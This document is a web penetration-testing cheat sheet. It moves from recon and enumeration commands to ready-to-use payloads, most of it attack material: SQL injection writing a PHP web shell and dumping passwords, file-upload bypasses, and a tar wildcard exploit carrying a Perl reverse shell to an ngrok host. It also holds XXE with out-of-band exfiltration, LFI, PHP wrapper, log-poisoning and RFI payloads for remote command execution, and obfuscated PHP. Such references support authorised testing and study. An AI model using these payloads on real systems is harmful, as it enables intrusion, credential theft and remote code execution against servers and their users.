Web Cheat Sheet

- Check if are known vulnerabilities
- Get versions, application, services, technologies etc.
- Source code review
- HTTPS -->certificate --> usernames, mail, subdomains
- Web Application Firewall (WAF)

whatweb -a 1 $URL
whatweb -a 3 $URL
whatweb -a 4 $URL
nuclei -ut && nuclei -target http://$IP 
nikto --host $URL -C all -o recon/nikto.txt 

Do a recursive search (not every tool do this automatically)
See default pages 
Use different wordlists 
Check every file you found (php,bak, html, py, txt, etc.)
Check for WAF

/robots.txt
/sitemap.xml
/crossdomain.xml
/clientaccesspolicy.xml
/.well-known/

###### files and folders
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
###### subdomains
/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
/usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-tickest-inventory.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

feroxbuster -t 10 -u http://$IP -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o enumeration/feroxbuster
dirsearch -u http://$IP -o enumeration/dirsearch
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://$IP -o enumeration/gobuster
wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://$IP/api/FUZZ

gobuster vhost -u http://$IP L -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200
wfuzz -c -f enumeration/subdomains.txt -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hl 7 -t 200 -u "http://$IP" -H "Host: FUZZ.$domain"

########################  tools scan ######################## 
http-waf-detect
nmap -p 80 --script http-waf-detect $IP

wafw00f $URL
ffuf -c -w "/opt/host/main.txt:FILE" -H "X-Originating-IP: 127.0.0.1, X-Forwarded-For: 127.0.0.1, X-Remote-IP: 127.0.0.1, X-Remote-Addr: 127.0.0.1, X-Client-IP: 127.0.0.1" -fs 5682,0 -u https://target/FUZZ

######################## manual check ############################
# Through telnet, you can identify if there is a WAF
telnet <site/ip> <80/443>
GET / HTTP/1.1

### Ports
# 264 / 18264     --> Checkpoint
# 4443 --> SonicWall / Sophos
# 500/udp --> Can be Cisco VPN (IPSEC iir**c)

### Bypass restrictions using parameter pollution
# You can use the same parameter several times**
example/profile?UserId=123 # Ok, your profile
example/profile?UserId=456 # ERROR
example/profile?UserId=456&UserId=123 # OK, it can work

### Tips
# - Some encoded/hashed IDs can be predictable --> Create accounts to see
# - Try some id, user_id, message_id even if the application seems to not offer it (on API for ex)
# - Parameter Polluttion (HPP)
# - Switch between POST and PUT to bypass potential controls**

#### Upload file ####
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
# Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users

#### Blind SQLi ####
### Boolean Based
'union select 1,2,3,4 where database() like '$database_name%';-- - # brute force the databse name (login if introduce corect name of databse) --> e.g. database name= mywebsite  --> should login if introduce "m" or "my" or "myw" and so on
'union select 1,2,3,4 where database() like binary '$database_name%';-- -

# use request file
sqlmap -r request.txt
# show databasees
sqlmap --dbs
# show everything of a DB
sqlmap -D database_name --dum
# show table of a DB
sqlmap -D database_name --tables
# show a table
sqlmap -D database_name -T table_name --dump
# choose techniques
sqlmap --technique=BEU  # blind, error, union
# current user
sqlmap --curent-user
# database name
sqlmap --current-db
# verbose mode
sqlmap -v 3 # levels from 1 to 6
# user info
sqlmap --privileges  --roles  --id-dba  --hostname
# system commands
sqlmap --os-shell
sqlmap --os-cmd whoami
# SQL queries
sqlmap --sql-shell
# authentication required
sqlmap --auth-type Basic --auth-cred 'admin:admin'
# TOR network
sqlmap --tor
# delay between requests
sqlmap --delay 1 # seconds
# try a specific parameter
sqlmap -p "param_name"

-----------
# Automated SQLMap Scan
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3

###### Double Extension
# If the target is only checking extension
-> exploit.php.jpg
# Tricks
-> exploit.php\ .jpg 
-> exploit.php\#.jpg


# MIME Type
# Classical, using Burp for example
Content-Type: application/x-php → Content-Type: image/gif

# Using cURL
curl -i -F "file=@shell.php;type=image/gif" --cookie "..." "<target>"

# You can also create or update the following registry key on Windows
{{HKLM\SOFTWARE\Classes\.php}}

# Then create a “String” type registry key and, named “Content-Type" and set the value “image/gif”

########################  NULL Byte ######################## 
→ exploit.php%00.jpg

########################  Zip Upload ######################## 
# You can get resources through ZIP upload and symlinks
ln -s ../../../index.php link
zip --symlinks test.zip link

########################  Wildcard & tar exploit  ######################## 
# If the server is using tar and wildcard (*) on uploaded files, you can exploit it by uploading 3 files :
• --checkpoint-action=exec=sh shell.sh
• --checkpoint=1
• shell.sh

# the shell.sh file contains a payload (different exploit are possible) :
• cat "path/index.php" > index.txt
• #!/bin/sh
perl -e 'use Socket;$i="0.tcp.ngrok.io";$p=15975;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
• tar cvf admin.tar ../../../admin

########################  PNG IDAT Chunks  ######################## 
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/

curl -X POST "http://xxx?page=../upload/ucdn6sCjDxredw1.png&0=readfile" --cookie "<cookie>" -d 

########################  basic XXE  ######################## 
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=path/index.php" >
]>

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]><title>&xxe;</title>

# XXE via Word:
<!-- word/document.xml -->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "nc -nlvp 31337"> %pe; ]>
<foo>&external;</foo>

<!-- word/document.xml -->
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "nc -nlvp 31337">
]>
<r>&sp;</r>

#### Out of Band XXE (OOB XXE) ####

# The exploitation will download a remote DTD file
# And then execute entities

# SVG File
<!DOCTYPE svg [
<!ENTITY % file SYSTEM "http://ip_server/file.dtd"
%file%template;
]>
<svg xmlns="http://www.w3.org/2000/svg">
	<text x="10" y="30">Injected : ùres;</text>
</svg>

# DTD file
<!ENTITY % secret1 SYSTEM "file:///flag.txt">
<!ENTITY % template "<!ENTITY res SYSTEM 'http://ip_server/?data=%secret1;'>">

########################  XSLT Injections  ######################## 
# You can execute commands through an external XML file
<br />Version: <xsl:value-of select="system-property('xsl:version')" />
<br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />

# Example
    <?xml version="1.0" encoding="UTF-8"?>
    <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    <body>
    <xsl:value-of select="php:function('readfile','index.php')" />
    </body>
    </html>

# Look for resource
<xsl:variable name="scana">
        implode('<br/>',scandir('.'))
</xsl:variable>
<br />Scan dir 1: <xsl:value-of select="php:function('preg_replace', '/.*/e', $scana, '')"

../../../../etc/passwd

.././.././.././.././etc/passwd

....//....//....//etc/passwd

....\/....\/....\/etc/passwd

/index.php?language=./languages/../../../../etc/passwd #specific path (./languages)

../../../../etc/passwd%00

../../../../etc/passwd%00.png

..\..\..\windows\win.ini

../ --> %2e%2e%2f (url encoding)

?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

/index.php?language=php://filter/read=convert.base64-encode/resource=configure

# avoid .php extension with path truncation by adding ././././
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done

$encoded=$(echo -ne '../../../../../../../../../../../../'| xxd --plain| tr -d '\n'| sed 's/\(..\)/%\1/g')
$curl http://$IP/d1r3c70ry_center/claim/index.php?view=${encoded}%2fetc%2fpasswd

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://$IP/index.php?FUZZ=value' -fs 2287 # change response size

# Fuzz LFI Payloads
ffuf -w /opt/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://$IP/index.php?language=FUZZ' -fs 2287 # change response size

/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-windows.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

######  Wrappers for files  #####
?page=php://filter/read=string.rot13/resource=index
?page=php://filter/convert.iconv.utf-8.utf-16/resource=index
?page=php://filter/convert.base64-encode/resource=index
?page=pHp://FilTer/convert.base64-encode/resource=index
?inc=php://filter/read=convert.base64-encode/resource=config.php

#### Wrappers for commands ####
?page=expect://whoami
?page=data:text/plain;,<?php echo shell_exec($_GET['cmd']);?>
?page=/proc/self/environ&cmd=ls
?file=<? php system($_GET['cmd']); ?>

#/var/lib/php/sessions/sess_PHPSSID_cookie -->stored data about a user in linux
#C:\Windows\Temp\   --> in windows
# see if it is vulnerable** 
http://<SERVER_IP>:<PORT>/index.php?language=en.php
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# see if the output change
http://<SERVER_IP>:<PORT>/index.php?language=session_poisoning
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# exploit the vulnerability
http://<SERVER_IP>:<PORT>/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fds

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

#compile the code above
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

# /etc/php/X.Y/apache2/php.ini --> php configuration file for Apache
# /etc/php/X.Y/fpm/php.ini   --> php configuration file for Nginx
# allow_url_include enabled (data wrapper)**
curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
# input
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
# expect
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect
#extension=expect  #(if this is set then we can execute commands)
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
# zip (it is not enabled by default)
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

#### The assert() function will execute code in params ####
#### Example using challenge ####
?page=..
Warning : assert() : Assertion "strpos(’includes/...php’, ’..’) === false" failed in path/index.php on line 8

#### The request looks like this ####
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")

#### If we inject this ####
?page=salade.php','..') || print('tomate') || strpos('oignons

#### The request will look like ####
assert("strpos('/includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') ===false")

#### Then, to exploit ####
?page=salade.php','..') || show_source('.passwd') || strpos('oignons

#### In PHP, regular expressions need delimiter ####
preg_match("recherche","contenu"); # wrong
preg_match("/recherche/","contenu"); # OK

#### preg_replace offers an option to execute code ####
preg_replace("input1search","input2replace","input3content");
preg_replace("/a/e","print(123)","abcd");
preg_replace("/a/e","print_r(scandir('.'))","abcd");
preg_replace("/a/e","file_get_contents('flag.php')","abcd");

#### It is possible to bypass some functions like preg_match by injecting non-alphanumeric char ####
# If the application uses eval() on the user input, the payload will still be executed

# Application code
if(!preg_match('/[a-zA-Z`]/', $_POST['input'])){
        print '<fieldset><legend>Result</legend>';
        eval('print '.$_POST['input'].";");
        print '</fieldset>';
    }
    

#### Exploitation and Bypass ####
# You can encode the payload in octal**
→ file_get_contents(".passwd")
→ "\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")

#### You can also use non alphanumeric char (https://github.com/v1ll41n/Und3rCov3r) ####
echo -n “phpinfo();” > tmp.php
php Und3rCov3r.ph 1 tmp.php

# If will create an alphax.php file containing the encoded payload
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$______________.$___.$______.$__________.$______________.$___.$______.$___________.$______________.$___.$______.$__________.$______.$___.$______.$__________.$___________.$___.$______.$_________.$___________.$___.$______.$__________.$____________.$___.$__________.$______________.$___.$__________.$______.$___.$____________.$________.'"');$__($_);

#### You can then for example read file ####
→ readfile(".passwd");
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$_______.$___.$______.$_________.$__________.$___.$______.$_________.$______.$___.$______.$_________.$_________.$___.$______.$_________.$___________.$___.$______.$__________.$______.$___.$______.$__________.$_________.$___.$______.$_________.$__________.$___.$__________.$______________.$___.$_________.$_______.$___.$__________.$___________.$___.$______.$___________.$______________.$___.$______.$_________.$______.$___.$______.$___________.$________.$___.$______.$___________.$________.$___.$______.$___________.$____________.$___.$______.$_________.$_________.$___.$_________.$_______.$___.$__________.$______.$___.$____________.$________.'"');$__($_);

#/var/log/sshd.log
#/var/log/mail
#/var/log/vsftpd.log
# first we need to see if we have access to this file through LFI then exploit User-Agent header**
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"
http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log&cmd=id

# Read php session parameters
 /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# Poison php session with web shell
 /index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE through poisoned php session
 /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# Poison Server logs
 curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>' 
 #RCE through poisoned PHP session
 /index.php?language=/var/log/apache2/access.log&cmd=id

# verify if the website is vulnerable to RFI 
http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php
# make a payload
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# execute this code with a python web server
sudo python3 -m http.server <LISTENING_PORT>
http://<SERVER_IP>/index.php?language=http://OUR_IP:;LISTENING_PORT>/shell.php&cmd=id
# Use a ftp server
sudo python -m pyftpdlib -p 21
http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
# Use SMB
impacket-smbserver -smb2support share $(pwd)  #(SMB server with python)
http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
# Include PHP Remote Webshell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id